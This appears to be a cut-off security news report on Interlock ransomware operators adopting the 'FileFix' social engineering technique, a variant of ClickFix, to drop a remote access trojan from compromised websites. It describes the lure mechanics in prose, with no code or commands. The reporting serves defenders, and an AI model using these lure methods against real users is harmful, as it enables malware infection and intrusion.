Hackers have adopted the new technique called 'FileFix' in Interlock ransomware attacks to drop a remote access trojan (RAT) on targeted systems.
Interlock ransomware operations have increased over the past months as the threat actor started using the KongTuke web injector (aka 'LandUpdate808') to deliver payloads through compromised websites.
This shift in modus operandi was observed by researchers at The DFIR Report and Proofpoint since May. Back then, visitors of compromised sites were prompted to pass a fake CAPTCHA + verification, and then paste into a Run dialog content automatically saved to the clipboard, a tactic consistent with ClickFix attacks.
The trick led users to execute a PowerShell script that fetched and launched a Node.js-based variant of the Interlock RAT.
In June, researchers found a PHP-based variant of Interlock RAT used in the wild, which was delivered using the same KongTuke injector.
Earlier this month, a significant change in the delivery wrapper occurred, with Interlock now switching to the FileFix variation of the ClickFix method as the preferred delivery method.
Interlock's FileFix attack
Source: The DFIR Report
FileFix is a social engineering attack technique developed by security researcher mr.d0x. It's an evolution of the ClickFix attack, which became one of the most widely employed payload distribution methods over the past year.
In the FileFix variation, the attacker weaponizes trusted Windows UI elements, such as File Explorer and HTML Applications (.HTA), to trick users into executing malicious PowerShell or JavaScript code without displaying any security warnings.
... continue reading